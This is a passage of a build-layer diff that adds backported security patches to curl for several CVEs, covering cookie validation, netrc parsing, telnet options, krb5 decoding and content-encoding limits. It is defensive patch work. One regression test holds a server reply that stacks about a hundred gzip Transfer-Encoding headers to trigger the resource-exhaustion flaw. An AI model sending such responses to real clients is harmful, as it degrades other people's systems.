119+++ b/lib/curl_config.h.cmake
120@@ -124,6 +124,9 @@
121 /* Define to 1 if you have the <assert.h> header file. */
122 #cmakedefine HAVE_ASSERT_H 1
123
124+/* Define to 1 if you have the `fchmod' function. */
125+#cmakedefine HAVE_FCHMOD 1
126+
127 /* Define to 1 if you have the `basename' function. */
128 #cmakedefine HAVE_BASENAME 1
129
130diff --git a/lib/fopen.c b/lib/fopen.c
131new file mode 100644
132index 0000000..ad3691b
133--- /dev/null
134+++ b/lib/fopen.c
135@@ -0,0 +1,113 @@
136+/***************************************************************************
137+ * _ _ ____ _
138+ * Project ___| | | | _ \| |
139+ * / __| | | | |_) | |
140+ * | (__| |_| | _ <| |___
141+ * \___|\___/|_| \_\_____|
142+ *
143+ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
144+ *
145+ * This software is licensed as described in the file COPYING, which
146+ * you should have received as part of this distribution. The terms
147+ * are also available at https://curl.se/docs/copyright.html.
148+ *
149+ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
150+ * copies of the Software, and permit persons to whom the Software is
151+ * furnished to do so, under the terms of the COPYING file.
152+ *
153+ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
154+ * KIND, either express or implied.
155+ *
156+ * SPDX-License-Identifier: curl
157+ *
158+ ***************************************************************************/
159+
160+#include "curl_setup.h"
161+
162+#if !defined(CURL_DISABLE_COOKIES) || !defined(CURL_DISABLE_ALTSVC) || \
163+ !defined(CURL_DISABLE_HSTS)
164+
165+#ifdef HAVE_FCNTL_H
166+#include <fcntl.h>
167+#endif
168+
169+#include "urldata.h"
170+#include "rand.h"
171+#include "fopen.h"
172+/* The last 3 #include files should be in this order */
173+#include "curl_printf.h"
174+#include "curl_memory.h"
175+#include "memdebug.h"
176+
177+/*
178+ * Curl_fopen() opens a file for writing with a temp name, to be renamed
179+ * to the final name when completed. If there is an existing file using this
180+ * name at the time of the open, this function will clone the mode from that
181+ * file. if 'tempname' is non-NULL, it needs a rename after the file is
182+ * written.
183+ */
184+CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
185+ FILE **fh, char **tempname)
186+{
187+ CURLcode result = CURLE_WRITE_ERROR;
188+ unsigned char randsuffix[9];
189+ char *tempstore = NULL;
190+ struct_stat sb;
191+ int fd = -1;
192+ *tempname = NULL;
193+
194+ if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
195+ /* a non-regular file, fallback to direct fopen() */
196+ *fh = fopen(filename, FOPEN_WRITETEXT);
197+ if(*fh)
198+ return CURLE_OK;
199+ goto fail;
200+ }
201+
202+ result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
203+ if(result)
204+ goto fail;
205+
206+ tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
207+ if(!tempstore) {
208+ result = CURLE_OUT_OF_MEMORY;
209+ goto fail;
210+ }
211+
212+ result = CURLE_WRITE_ERROR;
213+ fd = open(tempstore, O_WRONLY | O_CREAT | O_EXCL, 0600);
214+ if(fd == -1)
215+ goto fail;
216+
217+#ifdef HAVE_FCHMOD
218+ {
219+ struct_stat nsb;
220+ if((fstat(fd, &nsb) != -1) &&
221+ (nsb.st_uid == sb.st_uid) && (nsb.st_gid == sb.st_gid)) {
222+ /* if the user and group are the same, clone the original mode */
223+ if(fchmod(fd, sb.st_mode) == -1)
224+ goto fail;
225+ }
226+ }
227+#endif
228+
229+ *fh = fdopen(fd, FOPEN_WRITETEXT);
230+ if(!*fh)
231+ goto fail;
232+
233+ *tempname = tempstore;
234+ return CURLE_OK;
235+
236+fail:
237+ if(fd != -1) {
238+ close(fd);
239+ unlink(tempstore);
240+ }
241+
242+ free(tempstore);
243+
244+ *tempname = NULL;
245+ return result;
246+}
247+
248+#endif /* ! disabled */
249diff --git a/lib/fopen.h b/lib/fopen.h
250new file mode 100644
251index 0000000..289e55f
252--- /dev/null
253+++ b/lib/fopen.h
254@@ -0,0 +1,30 @@
255+#ifndef HEADER_CURL_FOPEN_H
256+#define HEADER_CURL_FOPEN_H
257+/***************************************************************************
258+ * _ _ ____ _
259+ * Project ___| | | | _ \| |
260+ * / __| | | | |_) | |
261+ * | (__| |_| | _ <| |___
262+ * \___|\___/|_| \_\_____|
263+ *
264+ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
265+ *
266+ * This software is licensed as described in the file COPYING, which
267+ * you should have received as part of this distribution. The terms
268+ * are also available at https://curl.se/docs/copyright.html.
269+ *
270+ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
271+ * copies of the Software, and permit persons to whom the Software is
272+ * furnished to do so, under the terms of the COPYING file.
273+ *
274+ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
275+ * KIND, either express or implied.
276+ *
277+ * SPDX-License-Identifier: curl
278+ *
279+ ***************************************************************************/
280+
281+CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
282+ FILE **fh, char **tempname);
283+
284+#endif
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32208.patch b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
new file mode 100644
index 0000000000..2939314d09
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
@@ -0,0 +1,72 @@
1From 3b90f0b2a7a84645acce151c86b40d25b5de6615 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Thu, 9 Jun 2022 09:27:24 +0200
4Subject: [PATCH] krb5: return error properly on decode errors
5
6Bug: https://curl.se/docs/CVE-2022-32208.html
7CVE-2022-32208
8Reported-by: Harry Sintonen
9Closes #9051
10
11Upstream-Status: Backport [https://github.com/curl/curl/commit/6ecdf5136b52af7]
12Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
13---
14 lib/krb5.c | 5 +----
15 lib/security.c | 13 ++++++++++---
16 2 files changed, 11 insertions(+), 7 deletions(-)
17
18diff --git a/lib/krb5.c b/lib/krb5.c
19index f50287a..5b77e35 100644
20--- a/lib/krb5.c
21+++ b/lib/krb5.c
22@@ -86,11 +86,8 @@ krb5_decode(void *app_data, void *buf, int len,
23 enc.value = buf;
24 enc.length = len;
25 maj = gss_unwrap(&min, *context, &enc, &dec, NULL, NULL);
26- if(maj != GSS_S_COMPLETE) {
27- if(len >= 4)
28- strcpy(buf, "599 ");
29+ if(maj != GSS_S_COMPLETE)
30 return -1;
31- }
32
33 memcpy(buf, dec.value, dec.length);
34 len = curlx_uztosi(dec.length);
35diff --git a/lib/security.c b/lib/security.c
36index fbfa707..3542210 100644
37--- a/lib/security.c
38+++ b/lib/security.c
39@@ -192,6 +192,7 @@ static CURLcode read_data(struct connectdata *conn,
40 {
41 int len;
42 CURLcode result;
43+ int nread;
44
45 result = socket_read(fd, &len, sizeof(len));
46 if(result)
47@@ -200,7 +201,10 @@ static CURLcode read_data(struct connectdata *conn,
48 if(len) {
49 /* only realloc if there was a length */
50 len = ntohl(len);
51- buf->data = Curl_saferealloc(buf->data, len);
52+ if(len > CURL_MAX_INPUT_LENGTH)
53+ len = 0;
54+ else
55+ buf->data = Curl_saferealloc(buf->data, len);
56 }
57 if(!len || !buf->data)
58 return CURLE_OUT_OF_MEMORY;
59@@ -208,8 +212,11 @@ static CURLcode read_data(struct connectdata *conn,
60 result = socket_read(fd, buf->data, len);
61 if(result)
62 return result;
63- buf->size = conn->mech->decode(conn->app_data, buf->data, len,
64- conn->data_prot, conn);
65+ nread = buf->size = conn->mech->decode(conn->app_data, buf->data, len,
66+ conn->data_prot, conn);
67+ if(nread < 0)
68+ return CURLE_RECV_ERROR;
69+ buf->size = (size_t)nread;
70 buf->index = 0;
71 return CURLE_OK;
72 }
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32221.patch b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
new file mode 100644
index 0000000000..8e662abd3a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
@@ -0,0 +1,29 @@
1From 75c04a3e75e8e3025a17ca3033ca307da9691cd0 Mon Sep 17 00:00:00 2001
2From: Vivek Kumbhar <vkumbhar@mvista.com>
3Date: Fri, 11 Nov 2022 10:49:58 +0530
4Subject: [PATCH] CVE-2022-32221
5
6Upstream-Status: Backport [https://github.com/curl/curl/commit/a64e3e59938abd7d6]
7CVE: CVE-2022-32221
8Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
9
10setopt: when POST is set, reset the 'upload' field.
11---
12 lib/setopt.c | 1 +
13 1 file changed, 1 insertion(+)
14
15diff --git a/lib/setopt.c b/lib/setopt.c
16index bebb2e4..4d96f6b 100644
17--- a/lib/setopt.c
18+++ b/lib/setopt.c
19@@ -486,6 +486,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
20 }
21 else
22 data->set.httpreq = HTTPREQ_GET;
23+ data->set.upload = FALSE;
24 break;
25
26 case CURLOPT_COPYPOSTFIELDS:
27--
282.25.1
29
diff --git a/meta/recipes-support/curl/curl/CVE-2022-35252.patch b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
new file mode 100644
index 0000000000..a5160c01f4
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
@@ -0,0 +1,72 @@
1From c9212bdb21f0cc90a1a60dfdbb716deefe78fd40 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 29 Aug 2022 00:09:17 +0200
4Subject: [PATCH] cookie: reject cookies with "control bytes"
5
6Rejects 0x01 - 0x1f (except 0x09) plus 0x7f
7
8Reported-by: Axel Chong
9
10Bug: https://curl.se/docs/CVE-2022-35252.html
11
12CVE-2022-35252
13
14Closes #9381
15
16Upstream-Status: Backport [https://github.com/curl/curl/commit/8dfc93e573ca740544a2d79ebb]
17
18Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
19---
20 lib/cookie.c | 29 +++++++++++++++++++++++++++++
21 1 file changed, 29 insertions(+)
22
23diff --git a/lib/cookie.c b/lib/cookie.c
24index a9ad20a..66c7715 100644
25--- a/lib/cookie.c
26+++ b/lib/cookie.c
27@@ -412,6 +412,30 @@ static bool bad_domain(const char *domain)
28 return !strchr(domain, '.') && !strcasecompare(domain, "localhost");
29 }
30
31+/*
32+ RFC 6265 section 4.1.1 says a server should accept this range:
33+
34+ cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E
35+
36+ But Firefox and Chrome as of June 2022 accept space, comma and double-quotes
37+ fine. The prime reason for filtering out control bytes is that some HTTP
38+ servers return 400 for requests that contain such.
39+*/
40+static int invalid_octets(const char *p)
41+{
42+ /* Reject all bytes \x01 - \x1f (*except* \x09, TAB) + \x7f */
43+ static const char badoctets[] = {
44+ "\x01\x02\x03\x04\x05\x06\x07\x08\x0a"
45+ "\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14"
46+ "\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f"
47+ };
48+ size_t vlen, len;
49+ /* scan for all the octets that are *not* in cookie-octet */
50+ len = strcspn(p, badoctets);
51+ vlen = strlen(p);
52+ return (len != vlen);
53+}
54+
55 /****************************************************************************
56 *
57 * Curl_cookie_add()
58@@ -558,6 +582,11 @@ Curl_cookie_add(struct Curl_easy *data,
59 badcookie = TRUE;
60 break;
61 }
62+ if(invalid_octets(whatptr) || invalid_octets(name)) {
63+ infof(data, "invalid octets in name/value, cookie dropped");
64+ badcookie = TRUE;
65+ break;
66+ }
67 }
68 else if(!len) {
69 /* this was a "<name>=" with no content, and we must allow
70--
712.35.1
72
diff --git a/meta/recipes-support/curl/curl/CVE-2022-35260.patch b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
new file mode 100644
index 0000000000..476c996b0a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
@@ -0,0 +1,68 @@
1From 3ff3989ec53d9ddcf4bdd99f5d5788dd87486768 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Tue, 4 Oct 2022 14:37:24 +0200
4Subject: [PATCH] netrc: replace fgets with Curl_get_line
5
6Upstream-Status: Backport
7CVE: CVE-2022-35260
8Reference to upstream patch: https://github.com/curl/curl/commit/c97ec984fb2bc919a3aa863e0476dffa377b184c
9
10Make the parser only accept complete lines and avoid problems with
11overly long lines.
12
13Reported-by: Hiroki Kurosawa
14
15Closes #9789
16---
17 lib/curl_get_line.c | 4 ++--
18 lib/netrc.c | 5 +++--
19 2 files changed, 5 insertions(+), 4 deletions(-)
20
21diff --git a/lib/curl_get_line.c b/lib/curl_get_line.c
22index c4194851ae09..4b9eea9e631c 100644
23--- a/lib/curl_get_line.c
24+++ b/lib/curl_get_line.c
25@@ -28,8 +28,8 @@
26 #include "memdebug.h"
27
28 /*
29- * get_line() makes sure to only return complete whole lines that fit in 'len'
30- * bytes and end with a newline.
31+ * Curl_get_line() makes sure to only return complete whole lines that fit in
32+ * 'len' bytes and end with a newline.
33 */
34 char *Curl_get_line(char *buf, int len, FILE *input)
35 {
36diff --git a/lib/netrc.c b/lib/netrc.c
37index 1c9da31993c9..93239132c9d8 100644
38--- a/lib/netrc.c
39+++ b/lib/netrc.c
40@@ -31,6 +31,7 @@
41 #include "netrc.h"
42 #include "strtok.h"
43 #include "strcase.h"
44+#include "curl_get_line.h"
45
46 /* The last 3 #include files should be in this order */
47 #include "curl_printf.h"
48@@ -83,7 +84,7 @@ static int parsenetrc(const char *host,
49 char netrcbuffer[4096];
50 int netrcbuffsize = (int)sizeof(netrcbuffer);
51
52- while(!done && fgets(netrcbuffer, netrcbuffsize, file)) {
53+ while(!done && Curl_get_line(netrcbuffer, netrcbuffsize, file)) {
54 tok = strtok_r(netrcbuffer, " \t\n", &tok_buf);
55 if(tok && *tok == '#')
56 /* treat an initial hash as a comment line */
57@@ -169,7 +170,7 @@ static int parsenetrc(const char *host,
58
59 tok = strtok_r(NULL, " \t\n", &tok_buf);
60 } /* while(tok) */
61- } /* while fgets() */
62+ } /* while Curl_get_line() */
63
64 out:
65 if(!retcode) {
66--
672.34.1
68
diff --git a/meta/recipes-support/curl/curl/CVE-2022-43552.patch b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
new file mode 100644
index 0000000000..d729441454
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
@@ -0,0 +1,82 @@
1rom 4f20188ac644afe174be6005ef4f6ffba232b8b2 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 19 Dec 2022 08:38:37 +0100
4Subject: [PATCH] smb/telnet: do not free the protocol struct in *_done()
5
6It is managed by the generic layer.
7
8Reported-by: Trail of Bits
9
10Closes #10112
11
12CVE: CVE-2022-43552
13Upstream-Status: Backport [https://github.com/curl/curl/commit/4f20188ac644afe174be6005ef4f6ffba232b8b2]
14Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
15---
16 lib/smb.c | 14 ++------------
17 lib/telnet.c | 3 ---
18 2 files changed, 2 insertions(+), 15 deletions(-)
19
20diff --git a/lib/smb.c b/lib/smb.c
21index 12f9925..8db3b27 100644
22--- a/lib/smb.c
23+++ b/lib/smb.c
24@@ -61,8 +61,6 @@ static CURLcode smb_connect(struct connectdata *conn, bool *done);
25 static CURLcode smb_connection_state(struct connectdata *conn, bool *done);
26 static CURLcode smb_do(struct connectdata *conn, bool *done);
27 static CURLcode smb_request_state(struct connectdata *conn, bool *done);
28-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
29- bool premature);
30 static CURLcode smb_disconnect(struct connectdata *conn, bool dead);
31 static int smb_getsock(struct connectdata *conn, curl_socket_t *socks);
32 static CURLcode smb_parse_url_path(struct connectdata *conn);
33@@ -74,7 +72,7 @@ const struct Curl_handler Curl_handler_smb = {
34 "SMB", /* scheme */
35 smb_setup_connection, /* setup_connection */
36 smb_do, /* do_it */
37- smb_done, /* done */
38+ ZERO_NULL, /* done */
39 ZERO_NULL, /* do_more */
40 smb_connect, /* connect_it */
41 smb_connection_state, /* connecting */
42@@ -99,7 +97,7 @@ const struct Curl_handler Curl_handler_smbs = {
43 "SMBS", /* scheme */
44 smb_setup_connection, /* setup_connection */
45 smb_do, /* do_it */
46- smb_done, /* done */
47+ ZERO_NULL, /* done */
48 ZERO_NULL, /* do_more */
49 smb_connect, /* connect_it */
50 smb_connection_state, /* connecting */
51@@ -919,14 +917,6 @@ static CURLcode smb_request_state(struct connectdata *conn, bool *done)
52 return CURLE_OK;
53 }
54
55-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
56- bool premature)
57-{
58- (void) premature;
59- Curl_safefree(conn->data->req.protop);
60- return status;
61-}
62-
63 static CURLcode smb_disconnect(struct connectdata *conn, bool dead)
64 {
65 struct smb_conn *smbc = &conn->proto.smbc;
66diff --git a/lib/telnet.c b/lib/telnet.c
67index 3347ad6..e3b9208 100644
68--- a/lib/telnet.c
69+++ b/lib/telnet.c
70@@ -1294,9 +1294,6 @@ static CURLcode telnet_done(struct connectdata *conn,
71
72 curl_slist_free_all(tn->telnet_vars);
73 tn->telnet_vars = NULL;
74-
75- Curl_safefree(conn->data->req.protop);
76-
77 return CURLE_OK;
78 }
79
80--
812.25.1
82
diff --git a/meta/recipes-support/curl/curl/CVE-2023-23916.patch b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
new file mode 100644
index 0000000000..054615963e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
@@ -0,0 +1,231 @@
1From 119fb187192a9ea13dc90d9d20c215fc82799ab9 Mon Sep 17 00:00:00 2001
2From: Patrick Monnerat <patrick@monnerat.net>
3Date: Mon, 13 Feb 2023 08:33:09 +0100
4Subject: [PATCH] content_encoding: do not reset stage counter for each header
5
6Test 418 verifies
7
8Closes #10492
9
10Upstream-Status: Backport [https://github.com/curl/curl/commit/119fb187192a9ea13dc90d9d20c215fc82799ab9]
11CVE: CVE-2023-23916
12Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
13---
14 lib/content_encoding.c | 7 +-
15 lib/urldata.h | 1 +
16 tests/data/Makefile.inc | 2 +-
17 tests/data/test418 | 152 ++++++++++++++++++++++++++++++++++++++++
18 4 files changed, 157 insertions(+), 5 deletions(-)
19 create mode 100644 tests/data/test418
20
21diff --git a/lib/content_encoding.c b/lib/content_encoding.c
22index 91e621f..7e098a5 100644
23--- a/lib/content_encoding.c
24+++ b/lib/content_encoding.c
25@@ -944,7 +944,6 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
26 {
27 struct Curl_easy *data = conn->data;
28 struct SingleRequest *k = &data->req;
29- int counter = 0;
30
31 do {
32 const char *name;
33@@ -979,9 +978,9 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
34 if(!encoding)
35 encoding = &error_encoding; /* Defer error at stack use. */
36
37- if(++counter >= MAX_ENCODE_STACK) {
38- failf(data, "Reject response due to %u content encodings",
39- counter);
40+ if(k->writer_stack_depth++ >= MAX_ENCODE_STACK) {
41+ failf(data, "Reject response due to more than %u content encodings",
42+ MAX_ENCODE_STACK);
43 return CURLE_BAD_CONTENT_ENCODING;
44 }
45 /* Stack the unencoding stage. */
46diff --git a/lib/urldata.h b/lib/urldata.h
47index ad0ef8f..168f874 100644
48--- a/lib/urldata.h
49+++ b/lib/urldata.h
50@@ -648,6 +648,7 @@ struct SingleRequest {
51 #ifndef CURL_DISABLE_DOH
52 struct dohdata doh; /* DoH specific data for this request */
53 #endif
54+ unsigned char writer_stack_depth; /* Unencoding stack depth. */
55 BIT(header); /* incoming data has HTTP header */
56 BIT(content_range); /* set TRUE if Content-Range: was found */
57 BIT(upload_done); /* set to TRUE when doing chunked transfer-encoding
58diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
59index 60e8176..40de8bc 100644
60--- a/tests/data/Makefile.inc
61+++ b/tests/data/Makefile.inc
62@@ -63,7 +63,7 @@ test350 test351 test352 test353 test354 test355 test356 test357 \
63 test393 test394 test395 \
64 \
65 test400 test401 test402 test403 test404 test405 test406 test407 test408 \
66-test409 \
67+test409 test418 \
68 \
69 test490 test491 test492 \
70 \
71diff --git a/tests/data/test418 b/tests/data/test418
72new file mode 100644
73index 0000000..50e974e
74--- /dev/null
75+++ b/tests/data/test418
76@@ -0,0 +1,152 @@
77+<testcase>
78+<info>
79+<keywords>
80+HTTP
81+gzip
82+</keywords>
83+</info>
84+
85+#
86+# Server-side
87+<reply>
88+<data nocheck="yes">
89+HTTP/1.1 200 OK
90+Transfer-Encoding: gzip
91+Transfer-Encoding: gzip
92+Transfer-Encoding: gzip
93+Transfer-Encoding: gzip
94+Transfer-Encoding: gzip
95+Transfer-Encoding: gzip
96+Transfer-Encoding: gzip
97+Transfer-Encoding: gzip
98+Transfer-Encoding: gzip
99+Transfer-Encoding: gzip
100+Transfer-Encoding: gzip
101+Transfer-Encoding: gzip
102+Transfer-Encoding: gzip
103+Transfer-Encoding: gzip
104+Transfer-Encoding: gzip
105+Transfer-Encoding: gzip
106+Transfer-Encoding: gzip
107+Transfer-Encoding: gzip
108+Transfer-Encoding: gzip
109+Transfer-Encoding: gzip
110+Transfer-Encoding: gzip
111+Transfer-Encoding: gzip
112+Transfer-Encoding: gzip
113+Transfer-Encoding: gzip
114+Transfer-Encoding: gzip
115+Transfer-Encoding: gzip
116+Transfer-Encoding: gzip
117+Transfer-Encoding: gzip
118+Transfer-Encoding: gzip
119+Transfer-Encoding: gzip
120+Transfer-Encoding: gzip
121+Transfer-Encoding: gzip
122+Transfer-Encoding: gzip
123+Transfer-Encoding: gzip
124+Transfer-Encoding: gzip
125+Transfer-Encoding: gzip
126+Transfer-Encoding: gzip
127+Transfer-Encoding: gzip
128+Transfer-Encoding: gzip
129+Transfer-Encoding: gzip
130+Transfer-Encoding: gzip
131+Transfer-Encoding: gzip
132+Transfer-Encoding: gzip
133+Transfer-Encoding: gzip
134+Transfer-Encoding: gzip
135+Transfer-Encoding: gzip
136+Transfer-Encoding: gzip
137+Transfer-Encoding: gzip
138+Transfer-Encoding: gzip
139+Transfer-Encoding: gzip
140+Transfer-Encoding: gzip
141+Transfer-Encoding: gzip
142+Transfer-Encoding: gzip
143+Transfer-Encoding: gzip
144+Transfer-Encoding: gzip
145+Transfer-Encoding: gzip
146+Transfer-Encoding: gzip
147+Transfer-Encoding: gzip
148+Transfer-Encoding: gzip
149+Transfer-Encoding: gzip
150+Transfer-Encoding: gzip
151+Transfer-Encoding: gzip
152+Transfer-Encoding: gzip
153+Transfer-Encoding: gzip
154+Transfer-Encoding: gzip
155+Transfer-Encoding: gzip
156+Transfer-Encoding: gzip
157+Transfer-Encoding: gzip
158+Transfer-Encoding: gzip
159+Transfer-Encoding: gzip
160+Transfer-Encoding: gzip
161+Transfer-Encoding: gzip
162+Transfer-Encoding: gzip
163+Transfer-Encoding: gzip
164+Transfer-Encoding: gzip
165+Transfer-Encoding: gzip
166+Transfer-Encoding: gzip
167+Transfer-Encoding: gzip
168+Transfer-Encoding: gzip
169+Transfer-Encoding: gzip
170+Transfer-Encoding: gzip
171+Transfer-Encoding: gzip
172+Transfer-Encoding: gzip
173+Transfer-Encoding: gzip
174+Transfer-Encoding: gzip
175+Transfer-Encoding: gzip
176+Transfer-Encoding: gzip
177+Transfer-Encoding: gzip
178+Transfer-Encoding: gzip
179+Transfer-Encoding: gzip
180+Transfer-Encoding: gzip
181+Transfer-Encoding: gzip
182+Transfer-Encoding: gzip
183+Transfer-Encoding: gzip
184+Transfer-Encoding: gzip
185+Transfer-Encoding: gzip
186+Transfer-Encoding: gzip
187+Transfer-Encoding: gzip
188+Transfer-Encoding: gzip
189+Transfer-Encoding: gzip
190+
191+-foo-
192+</data>
193+</reply>
194+
195+#
196+# Client-side
197+<client>
198+<server>
199+http
200+</server>
201+ <name>
202+Response with multiple Transfer-Encoding headers
203+ </name>
204+ <command>
205+http://%HOSTIP:%HTTPPORT/%TESTNUMBER -sS
206+</command>
207+</client>
208+
209+#
210+# Verify data after the test has been "shot"
211+<verify>
212+<protocol crlf="yes">
213+GET /%TESTNUMBER HTTP/1.1
214+Host: %HOSTIP:%HTTPPORT
215+User-Agent: curl/%VERSION
216+Accept: */*
217+
218+</protocol>
219+
220+# CURLE_BAD_CONTENT_ENCODING is 61
221+<errorcode>
222+61
223+</errorcode>
224+<stderr mode="text">
225+curl: (61) Reject response due to more than 5 content encodings
226+</stderr>
227+</verify>
228+</testcase>
229--
2302.25.1
231
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27533.patch b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
new file mode 100644
index 0000000000..64ba135056
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
@@ -0,0 +1,59 @@
1Backport of:
2
3From 538b1e79a6e7b0bb829ab4cecc828d32105d0684 Mon Sep 17 00:00:00 2001
4From: Daniel Stenberg <daniel@haxx.se>
5Date: Mon, 6 Mar 2023 12:07:33 +0100
6Subject: [PATCH] telnet: only accept option arguments in ascii
7
8To avoid embedded telnet negotiation commands etc.
9
10Reported-by: Harry Sintonen
11Closes #10728
12
13Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27533.patch?h=ubuntu/focal-security
14Upstream commit https://github.com/curl/curl/commit/538b1e79a6e7b0bb829ab4cecc828d32105d0684]
15CVE: CVE-2023-27533
16Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
17---
18 lib/telnet.c | 15 +++++++++++++++
19 1 file changed, 15 insertions(+)
20
21--- a/lib/telnet.c
22+++ b/lib/telnet.c
23@@ -815,6 +815,17 @@ static void printsub(struct Curl_easy *d
24 }
25 }
26
27+static bool str_is_nonascii(const char *str)
28+{
29+ size_t len = strlen(str);
30+ while(len--) {
31+ if(*str & 0x80)
32+ return TRUE;
33+ str++;
34+ }
35+ return FALSE;
36+}
37+
38 static CURLcode check_telnet_options(struct connectdata *conn)
39 {
40 struct curl_slist *head;
41@@ -829,6 +840,8 @@ static CURLcode check_telnet_options(str
42 /* Add the user name as an environment variable if it
43 was given on the command line */
44 if(conn->bits.user_passwd) {
45+ if(str_is_nonascii(data->conn->user))
46+ return CURLE_BAD_FUNCTION_ARGUMENT;
47 msnprintf(option_arg, sizeof(option_arg), "USER,%s", conn->user);
48 beg = curl_slist_append(tn->telnet_vars, option_arg);
49 if(!beg) {
50@@ -844,6 +857,9 @@ static CURLcode check_telnet_options(str
51 if(sscanf(head->data, "%127[^= ]%*[ =]%255s",
52 option_keyword, option_arg) == 2) {
53
54+ if(str_is_nonascii(option_arg))
55+ continue;
56+
57 /* Terminal type */
58 if(strcasecompare(option_keyword, "TTYPE")) {
59 strncpy(tn->subopt_ttype, option_arg, 31);
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
new file mode 100644
index 0000000000..46c57afb73
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
@@ -0,0 +1,51 @@
1From 6c51adeb71da076c5c40a45e339e06bb4394a86b Mon Sep 17 00:00:00 2001
2From: Eric Vigeant <evigeant@gmail.com>
3Date: Wed, 2 Nov 2022 11:47:09 -0400
4Subject: [PATCH] cur_path: do not add '/' if homedir ends with one
5
6When using SFTP and a path relative to the user home, do not add a
7trailing '/' to the user home dir if it already ends with one.
8
9Closes #9844
10
11CVE: CVE-2023-27534
12Note:
13- The upstream patch for CVE-2023-27534 does three things:
141) creates new path with dynbuf(dynamic buffer)
152) solves the tilde error which causes CVE-2023-27534
163) modifies the below added functionality to not add a trailing "/" to the user home dir if it already ends with one with dynbuf.
17- dynbuf functionalities are added in curl in later versions and are not essential to fix the vulnerability but does add extra feature in later versions.
18- This patch completes the 3rd task of the patch which was implemented without using dynbuf
19Upstream-Status: Backport from [https://github.com/curl/curl/commit/6c51adeb71da076c5c40a45e339e06bb4394a86b]
20
21Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
22Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
23---
24 lib/curl_path.c | 10 +++++++---
25 1 file changed, 7 insertions(+), 3 deletions(-)
26
27diff --git a/lib/curl_path.c b/lib/curl_path.c
28index f429634..40b92ee 100644
29--- a/lib/curl_path.c
30+++ b/lib/curl_path.c
31@@ -70,10 +70,14 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
32 /* It is referenced to the home directory, so strip the
33 leading '/' */
34 memcpy(real_path, homedir, homelen);
35- real_path[homelen] = '/';
36- real_path[homelen + 1] = '\0';
37+ /* Only add a trailing '/' if homedir does not end with one */
38+ if(homelen == 0 || real_path[homelen - 1] != '/') {
39+ real_path[homelen] = '/';
40+ homelen++;
41+ real_path[homelen] = '\0';
42+ }
43 if(working_path_len > 3) {
44- memcpy(real_path + homelen + 1, working_path + 3,
45+ memcpy(real_path + homelen, working_path + 3,
46 1 + working_path_len -3);
47 }
48 }
49--
502.24.4
51
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534.patch b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
new file mode 100644
index 0000000000..3ecd181290
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
@@ -0,0 +1,33 @@
1From 4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Thu, 9 Mar 2023 16:22:11 +0100
4Subject: [PATCH] curl_path: create the new path with dynbuf
5
6Closes #10729
7
8CVE: CVE-2023-27534
9Note: This patch is needed to backport CVE-2023-27534
